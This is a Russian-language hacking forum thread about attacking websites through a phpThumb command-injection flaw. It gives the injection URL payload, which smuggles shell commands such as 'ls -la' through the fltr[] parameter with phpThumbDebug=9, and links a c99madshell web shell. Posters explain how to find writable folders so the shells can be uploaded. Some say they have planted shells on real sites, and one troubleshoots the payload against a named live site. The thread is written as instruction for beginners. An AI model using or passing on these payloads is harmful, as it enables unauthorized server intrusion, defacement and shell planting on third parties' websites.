Видюшка http://www.youtube.com/watch?v=aKnrhIkPCqg http://slil.ru/29520436 Атакуем через phpThumb Видео не претендует на звание "ПОБЕДИТЕЛЬ!" Просто для !начинающих! и школоты. Ну и еще чисто поржать Все достаточно просто. http://www.securityfocus.com/bid/39605/ Эксплоит, прямые руки, чутка смекалки и у нас куча шеллов Удачного дня! p.s Еще раз повторю, способ на видео чрезвычайно простой. Мне еще повезло с правами на запись в папку. Обычно приходится еще и искать папку с правами на запись или портить зрение с выводом не в текстовом виде, а картинкой с красными буквами на розовом фоне =\
Я выложил ссылку на сплоит + я утром просил лило не постить сюда это. Ну да ладно, пускай будет. там есть галочка с параметром "качество"
этот способ еще хорош тем, что не трогаешь основу сайта. http://www.starcorner.ru/ Вроде ничего такого-то(скулей, хсс, да и пыхи толком-то нет!) и нет.... Тогда откуда тут ЧВ? Дефейсил не я, но шелл мой. К конкурсу сайт не относится Лило, ну ты понел. В аське отписал уже
мне нравится, может я в лесу живу но я не слышал о таком сплойте, для меня позновательно. P.S. если у тебя шелл не приватный, выложи пожалуйста
На видео http://madnet.name/files/download/9_c99madshell.php А вообще wso больше нравится. респект oRb`у.
Еще такая пометочка: Если выдает ошибку, попробуйте указать путь до реальной картинки на сервере. Если все таки выдало список файлов и папок, но шелл не льется - в большинстве случаев нужно искать папку для записи. Например папка uploads или смотрите установленные форумы, движки и etc, читайте инструкцию по установке и найдете где какие права на папки рекомендуют ставить. Если знаете, или хотите найти такую папку, то вот вам команда Первая часть это полный путь до папки на сервере (в начале дебага путь пишется, что, кстати, тоже очень полезно), ну а вторая путь до шелла. Еще бывает, что вообще ничего не отображается или отображается большая белая картинка - все равно попробуйте залить. У меня так прокатывало несколько раз. И не забывайте обращать внимание на чувствительность к символам. Т.е. если скрипт переименовали в phpthumb.php (Т маленькая), то начало сплоита тоже должно быть таким же.
что за лажа сплоит такой: phpThumb.php?src=/home/example.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/example.com/public_html/kartinka.jpg" jpeg:"/home/example.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9 здесь нужно вместо example.com вставлять атакуемый сайт?
phpThumb.php?src=/home/site.com/public_html/kartinka.jpg&fltr[]=blur|5 -quality 75 -interlace line "/home/site.com/public_html/kartinka.jpg" jpeg:"/home/site.com/public_html/kartinka.jpg" ; ls -la ;&phpThumbDebug=9 & это &
Че-то у меня не выходит: _аhart.com.au/thumbnail/phpThumb.php?src=/images/project/Sutherland_Contemporary.jpg&fltr[]=blur|5 -quality 75 -interlace line "/images/project/Sutherland_Contemporary.jpg" jpeg:"/images/project/Sutherland_Contemporary.jpg";ls -la (Первую букву в названии заменить на английскую a). Тупо отображает эту картинку да и все. А на все эти потуги с коммандами срет, как видно. На многих сайтах такая же фигня.
А потому что ты основную команду вывода результата - debug - дел куда-то. Вот так должно быть: ... ; ls -la ;&phpThumbDebug=9
Упс, спасибо! Мда че-то все равно ***: thumbnail/phpThumb.php?src=/images/project/Sutherland_Contemporary.jpg&fltr[]=blur|5 -quality 75 -interlace line "/images/project/Sutherland_Contemporary.jpg" jpeg:"/images/project/Sutherland_Contemporary.jpg";ls -la;&phpThumbDebug=9 При этом выкидывает Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 700 bytes). А при других значениях Debug вообще тупо выдает конфигурацию PHPThumb'а, как я понял.
